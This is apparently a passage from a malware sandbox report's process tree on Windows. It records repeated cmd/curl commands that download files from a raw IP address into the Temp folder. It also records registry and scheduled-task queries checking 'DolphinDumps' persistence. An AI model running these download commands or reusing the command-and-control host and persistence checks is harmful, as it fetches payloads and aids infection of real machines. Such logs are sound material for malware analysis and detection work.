    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\xhcne" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:4168
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\xhcne" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:2020
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\leolq" "178.215.224.74/v10/ukyh.php?jspo=33&jwvs=80E79B56FCD3600852CF072C4FE866"
        5⤵
        
        PID:816
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\leolq" "178.215.224.74/v10/ukyh.php?jspo=33&jwvs=80E79B56FCD3600852CF072C4FE866"
        6⤵
        
        PID:476
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\toieq" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:3764
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\toieq" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:2368
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\kboty" "178.215.224.74/v10/ukyh.php?jspo=3&jwvs=80E79B56FCD3600852CF072C4FE866&vprl=2"
        5⤵
        
        PID:3388
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\kboty" "178.215.224.74/v10/ukyh.php?jspo=3&jwvs=80E79B56FCD3600852CF072C4FE866&vprl=2"
        6⤵
        
        PID:4884
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4508
      - C:\Windows\SysWOW64\reg.exe
        
        REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        6⤵
        
        PID:1204
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        5⤵
        
        PID:1960
      - C:\Windows\SysWOW64\reg.exe
        
        reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2712
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        5⤵
        
        PID:3168
      - C:\Windows\SysWOW64\schtasks.exe
        
        SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        6⤵
        
        PID:2292
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\ddjke" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:3300
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\ddjke" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:3928
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\jasjk" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=80E79B56FCD3600852CF072C4FE866&zjyp=true&yuvc=false&nzrj=00000&sftb=true"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1388
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\jasjk" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=80E79B56FCD3600852CF072C4FE866&zjyp=true&yuvc=false&nzrj=00000&sftb=true"
        6⤵
        
        PID:708
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\pkpqn" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:1036
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\pkpqn" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:4740
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\jspds" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:2548
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\jspds" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:1472
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\ptlup" "178.215.224.74/v10/ukyh.php?gi"
        5⤵
        
        PID:3596
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\ptlup" "178.215.224.74/v10/ukyh.php?gi"
        6⤵
        
        PID:2380
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\chjfh" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1800
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\chjfh" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:2412
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\jbaac" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4576
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\jbaac" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:4704
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\kahwc" "178.215.224.74/v10/ukyh.php?jspo=3&jwvs=80E79B56FCD3600852CF072C4FE866&vprl=2"
        5⤵
        
        PID:5104
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\kahwc" "178.215.224.74/v10/ukyh.php?jspo=3&jwvs=80E79B56FCD3600852CF072C4FE866&vprl=2"
        6⤵
        
        PID:640
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        5⤵
        
        PID:2096
      - C:\Windows\SysWOW64\reg.exe
        
        REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        6⤵
        
        PID:3856
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        5⤵
        
        PID:1672
      - C:\Windows\SysWOW64\reg.exe
        
        reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        6⤵
        
        PID:3076
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        5⤵
        
        PID:2280
      - C:\Windows\SysWOW64\schtasks.exe
        
        SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:3036
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\pjzck" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:5084
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\pjzck" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:3424
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\xzbkk" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=80E79B56FCD3600852CF072C4FE866&zjyp=true&yuvc=false&nzrj=00000&sftb=true"
        5⤵
        
        PID:4968
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\xzbkk" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=80E79B56FCD3600852CF072C4FE866&zjyp=true&yuvc=false&nzrj=00000&sftb=true"
        6⤵
        
        PID:3300
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2548
      - C:\Windows\SysWOW64\reg.exe
        
        REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        6⤵
        
        PID:5092
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        5⤵
        
        PID:736
      - C:\Windows\SysWOW64\reg.exe
        
        reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        6⤵
        
        PID:700
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        5⤵
        
        PID:536
      - C:\Windows\SysWOW64\schtasks.exe
        
        SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        6⤵
        
        PID:4608
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\lowwa" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:2720
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\lowwa" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:1596
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\vuwqj" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=80E79B56FCD3600852CF072C4FE866&zjyp=true&yuvc=false&nzrj=00000&sftb=true"
        5⤵
        
        PID:972
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\vuwqj" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=80E79B56FCD3600852CF072C4FE866&zjyp=true&yuvc=false&nzrj=00000&sftb=true"
        6⤵
        
        PID:2828
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        5⤵
        
        PID:4320
      - C:\Windows\SysWOW64\reg.exe
        
        REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        6⤵
        
        PID:4368
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        5⤵
        
        PID:2316
      - C:\Windows\SysWOW64\reg.exe
        
        reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        6⤵
        
        PID:3708
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        5⤵
        
        PID:944
      - C:\Windows\SysWOW64\schtasks.exe
        
        SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        6⤵
        
        PID:2800
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\omnxf" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:3040
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\omnxf" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:3400
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\cjjpa" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=80E79B56FCD3600852CF072C4FE866&zjyp=true&yuvc=false&nzrj=00000&sftb=true"
        5⤵
        
        PID:1080
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\cjjpa" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=80E79B56FCD3600852CF072C4FE866&zjyp=true&yuvc=false&nzrj=00000&sftb=true"
        6⤵
        
        PID:1696
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        5⤵
        
        PID:1472
      - C:\Windows\SysWOW64\reg.exe
        
        REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        6⤵
        
        PID:4700
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        5⤵
        
        PID:4240
      - C:\Windows\SysWOW64\reg.exe
        
        reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        6⤵
        
        PID:1824
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        5⤵
        
        PID:240
      - C:\Windows\SysWOW64\schtasks.exe
        
        SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        6⤵
        
        PID:1460
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\bpncq" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:4780
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\bpncq" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:4440
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\ybuvs" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=80E79B56FCD3600852CF072C4FE866&zjyp=true&yuvc=false&nzrj=00000&sftb=true"
        5⤵
        
        PID:1060
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\ybuvs" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=80E79B56FCD3600852CF072C4FE866&zjyp=true&yuvc=false&nzrj=00000&sftb=true"
        6⤵
        
        PID:3076
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        5⤵
        
        PID:4540
      - C:\Windows\SysWOW64\reg.exe
        
        REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2364
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        5⤵
        
        PID:4812
      - C:\Windows\SysWOW64\reg.exe
        
        reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        6⤵
        
        PID:4976
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1156
      - C:\Windows\SysWOW64\schtasks.exe
        
        SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        6⤵
        
        PID:2368
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\fjfvt" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:3388
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\fjfvt" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:1204
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\jzvoe" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=80E79B56FCD3600852CF072C4FE866&zjyp=true&yuvc=true&nzrj=00000&sftb=true"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4396
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\jzvoe" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=80E79B56FCD3600852CF072C4FE866&zjyp=true&yuvc=true&nzrj=00000&sftb=true"
        6⤵
        
        PID:2980
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\psoam" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:760
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\psoam" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:3168
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        5⤵
        
        PID:4124
      - C:\Windows\SysWOW64\reg.exe
        
        REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        6⤵
        
        PID:784
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        5⤵
        
        PID:3604
      - C:\Windows\SysWOW64\reg.exe
        
        reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:1000
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        5⤵
        
        PID:3048
      - C:\Windows\SysWOW64\schtasks.exe
        
        SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        6⤵
        
        PID:4764
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\gfgun" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:1668
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\gfgun" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:708
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\ntykv" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=80E79B56FCD3600852CF072C4FE866&zjyp=true&yuvc=true&nzrj=00000&sftb=true"
        5⤵
        
        PID:4768
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\ntykv" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=80E79B56FCD3600852CF072C4FE866&zjyp=true&yuvc=true&nzrj=00000&sftb=true"
        6⤵
        
        PID:4040
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\kcndc" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:4340
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\kcndc" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:3640
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        5⤵
        
        PID:3348
      - C:\Windows\SysWOW64\reg.exe
        
        REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        6⤵
        
        PID:4808
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3740
      - C:\Windows\SysWOW64\reg.exe
        
        reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        6⤵
        
        PID:4188
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        5⤵
        
        PID:3300
      - C:\Windows\SysWOW64\schtasks.exe
        
        SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:3164
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\dcbal" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:4240
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\dcbal" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:1820
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\dpxaf" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=80E79B56FCD3600852CF072C4FE866&zjyp=true&yuvc=true&nzrj=00000&sftb=true"
        5⤵
        
        PID:1420
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\dpxaf" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=80E79B56FCD3600852CF072C4FE866&zjyp=true&yuvc=true&nzrj=00000&sftb=true"
        6⤵
        
        PID:816
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\gwolx" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:3892
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\gwolx" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:4964
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        5⤵
        
        PID:3508
      - C:\Windows\SysWOW64\reg.exe
        
        REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        6⤵
        
        PID:1236
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        5⤵
        
        PID:2708
      - C:\Windows\SysWOW64\reg.exe
        
        reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        6⤵
        
        PID:236
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3092
      - C:\Windows\SysWOW64\schtasks.exe
        
        SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        6⤵
        
        PID:4772
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\deohi" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:4768
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\deohi" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:1324
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\apdrv" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=80E79B56FCD3600852CF072C4FE866&zjyp=true&yuvc=true&nzrj=00000&sftb=true"
        5⤵
        
        PID:4340
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\apdrv" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=80E79B56FCD3600852CF072C4FE866&zjyp=true&yuvc=true&nzrj=00000&sftb=true"
        6⤵
        
        PID:4484
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\akxtf" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:3900
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\akxtf" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:3444
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        5⤵
        
        PID:3708
      - C:\Windows\SysWOW64\reg.exe
        
        REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:5112
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        5⤵
        
        PID:3216
      - C:\Windows\SysWOW64\reg.exe
        
        reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        6⤵
        
        PID:3860
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:984
      - C:\Windows\SysWOW64\schtasks.exe
        
        SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        6⤵
        
        PID:2712
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\oqxav" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:1796
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\oqxav" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:1632
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\ppfsl" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=80E79B56FCD3600852CF072C4FE866&zjyp=true&yuvc=true&nzrj=00000&sftb=true"
        5⤵
        
        PID:1780
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\ppfsl" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=80E79B56FCD3600852CF072C4FE866&zjyp=true&yuvc=true&nzrj=00000&sftb=true"
        6⤵
        
        PID:2380
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\fdhhr" "178.215.224.74/v10/ukyh.php?jspo=6"
        5⤵
        
        PID:3076
      - C:\Windows\SysWOW64\curl.exe
        
        curl -s -o "C:\Users\Admin\AppData\Local\temp\fdhhr" "178.215.224.74/v10/ukyh.php?jspo=6"
        6⤵
        
        PID:1048
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        5⤵
        
        PID:1308
      - C:\Windows\SysWOW64\reg.exe
        
        REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
        6⤵
        
        PID:3228
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1064
      - C:\Windows\SysWOW64\reg.exe
        
        reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
        6⤵
        
        PID:1068
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C SCHTASKS /QUERY /TN MyTasks\DolphinDumps
        5⤵
